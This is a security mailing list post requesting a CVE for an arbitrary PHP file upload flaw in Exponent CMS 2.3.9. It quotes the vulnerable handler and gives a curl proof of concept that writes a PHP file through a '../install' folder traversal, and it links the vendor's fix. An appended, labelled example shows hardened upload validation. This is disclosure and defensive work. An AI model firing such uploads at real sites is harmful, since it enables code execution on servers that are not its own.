Message-ID: <CAEiFw0UvtbGuJ-M_zR0M+BtrEMn_tg7J3KZs+huS25imOSTNkg@mail.gmail.com>
Date: Wed, 21 Sep 2016 08:10:39 +0800
From: Carl Peng <felixk3y@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE request:Exponent CMS 2.3.9 Arbitrary File Upload vulnerability in expFile.php

Hi, I reported the following Arbitrary File Upload vulnerability to the
ExponentCMS team on Sep 13, 2016:
vulnerability:
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/file/controllers/fileController.php#L570-L592
```
if (!empty($this->params['folder']) || (defined('QUICK_UPLOAD_FOLDER') && QUICK_UPLOAD_FOLDER != '' && QUICK_UPLOAD_FOLDER != 0)) {
    // prevent attempt to place file somewhere other than /files folder
    if (!empty($this->params['folder']) && strpos($this->params['folder'], '..') !== false) {
        $ar = new expAjaxReply(300, gt("File was not uploaded!"));
        $ar->send();
    }
    if (SITE_FILE_MANAGER == 'picker') {
        $quikFolder = !empty($this->params['folder']) ? $this->params['folder'] : QUICK_UPLOAD_FOLDER;
        $destDir = null;
    } elseif (SITE_FILE_MANAGER == 'elfinder') {
        $quikFolder = null;
        $destDir = UPLOAD_DIRECTORY_RELATIVE . (!empty($this->params['folder']) ? $this->params['folder'] : QUICK_UPLOAD_FOLDER) . '/';
        // create folder if non-existant
        expFile::makeDirectory($destDir);
    }
} else {
    $quikFolder = null;
    $destDir = null;
}
//extensive suitability check before doing anything with the file...
if (isset($_SERVER['HTTP_X_FILE_NAME'])) {  //HTML5 XHR upload
    $file = expFile::fileXHRUpload($_SERVER['HTTP_X_FILE_NAME'],false,false,null,$destDir,intval(QUICK_UPLOAD_WIDTH));
    //here File Upload vulnerability
    $file->poster = $user->id;
```
Both the "folder" parameter and "$_SERVER['HTTP_X_FILE_NAME']" may be submitted by the user.

expFile::fileXHRUpload():
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/file/models/expFile.php#L526
```
$_destFile = ($_destFile == null) ? self::fixName($fileName) : $_destFile;
//"fileName" parameter may be submitted by the user
//...
$maxwidth = intval($_max_width);
if (!empty($maxwidth)) {
    //...
} else {
    file_put_contents($_destFullPath, file_get_contents('php://input', 'r')); // line 572
}
```

Proof of concept:
curl -H "X-File-Name: e.php" -d "controller=file&action=quickUpload&code=<?php phpinfo();?>&folder=../install" http://www.exponentcms.org/index.php

http://www.exponentcms.org/install/e.php


This vulnerability has now been fixed.
https://exponentcms.lighthouseapp.com/projects/61783/changesets/355702a9835cf527796c9d469a82258b7639148a
https://github.com/exponentcms/exponent-cms/commit/355702a9835cf527796c9d469a82258b7639148a

This issue was reported by Peng Hua of silence.com.cn Inc. and I would like
to request a CVE for this issue (if not done so).

Thank you.
---------------------------------http://www.silence.com.cn
penghua#silence.com.cn
PKAV Team
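An added example, not part of the original post and not Exponent CMS code, showing the checks a quick-upload handler of the shape quoted above needs before writing php://input to disk: the user-supplied file name (the X-File-Name header) is reduced to a base name and held to an extension allow-list, the folder is restricted to a single plain directory name rather than only tested for "..", and the final directory is confirmed with realpath() to lie under the upload root. UPLOAD_BASE, ALLOWED_EXT, the function names and the demo inputs are assumptions made for this example.

```php
<?php
// Added example, not Exponent CMS code. UPLOAD_BASE, ALLOWED_EXT and the
// function names below are assumptions made for this demonstration.
define('UPLOAD_BASE', sys_get_temp_dir() . '/upload_demo_files');
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];

/**
 * Return the absolute destination path for an upload, or null to reject it.
 * $folder (POST "folder") and $fileName (X-File-Name header) are both
 * attacker-controlled, so neither is trusted for any path component.
 */
function safe_upload_path(string $folder, string $fileName): ?string
{
    // File name: drop any directory part (both separator styles) and
    // refuse anything that is not a plain name of printable ASCII.
    $name = basename(str_replace('\\', '/', $fileName));
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$/', $name)) {
        return null;
    }
    // Extension allow-list applied to every dotted segment, so that
    // "e.php", "e.php.jpg" and "e.jpg.php" are all rejected.
    $segments = explode('.', strtolower($name));
    array_shift($segments);                       // the base name itself
    if ($segments === []) {
        return null;                              // an extension is required
    }
    foreach ($segments as $ext) {
        if (!in_array($ext, ALLOWED_EXT, true)) {
            return null;
        }
    }
    // Folder: one plain directory name or nothing. A substring test for
    // ".." is not enough on its own; this rejects "../install" outright.
    if ($folder !== '' && !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $folder)) {
        return null;
    }
    $dir = $folder === '' ? UPLOAD_BASE : UPLOAD_BASE . '/' . $folder;
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        return null;
    }
    // Canonical containment check: after symlink resolution the directory
    // must still be UPLOAD_BASE itself or a descendant of it.
    $realBase = realpath(UPLOAD_BASE);
    $realDir  = realpath($dir);
    if ($realBase === false || $realDir === false
        || ($realDir !== $realBase && strpos($realDir, $realBase . '/') !== 0)) {
        return null;
    }
    return $realDir . '/' . $name;
}

/** Handler using the check; the rejection path terminates the request. */
function handle_quick_upload(): void
{
    $dest = safe_upload_path($_POST['folder'] ?? '', $_SERVER['HTTP_X_FILE_NAME'] ?? '');
    if ($dest === null) {
        http_response_code(400);
        echo json_encode(['error' => 'File was not uploaded!']);
        exit;                                     // do not fall through to the write
    }
    $out = fopen($dest, 'xb');                    // 'x' refuses to overwrite
    if ($out === false) {
        http_response_code(409);
        exit;
    }
    $in = fopen('php://input', 'rb');
    stream_copy_to_stream($in, $out, 10 * 1024 * 1024);   // hard size cap
    fclose($in);
    fclose($out);
    echo json_encode(['stored' => basename($dest)]);
}

// Constructed demo inputs, run from the command line: php upload_check.php
if (PHP_SAPI === 'cli') {
    @mkdir(UPLOAD_BASE, 0750, true);
    $cases = [
        ['',           'e.php'],          // the advisory's file name
        ['../install', 'e.php'],          // the advisory's folder and name
        ['pics',       '../../e.php'],
        ['pics',       'photo.jpg'],      // the only one that should pass
    ];
    foreach ($cases as [$folder, $name]) {
        $dest = safe_upload_path($folder, $name);
        printf("%-12s %-12s => %s\n", $folder, $name, $dest ?? 'REJECTED');
    }
}
```

The order of the checks matters: the file name is validated before the folder so that a rejected extension never causes a directory to be created, and the rejection path calls exit so that a failed check cannot fall through to the file write, which is the part of the quoted handler that the reporter's PoC exercises.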
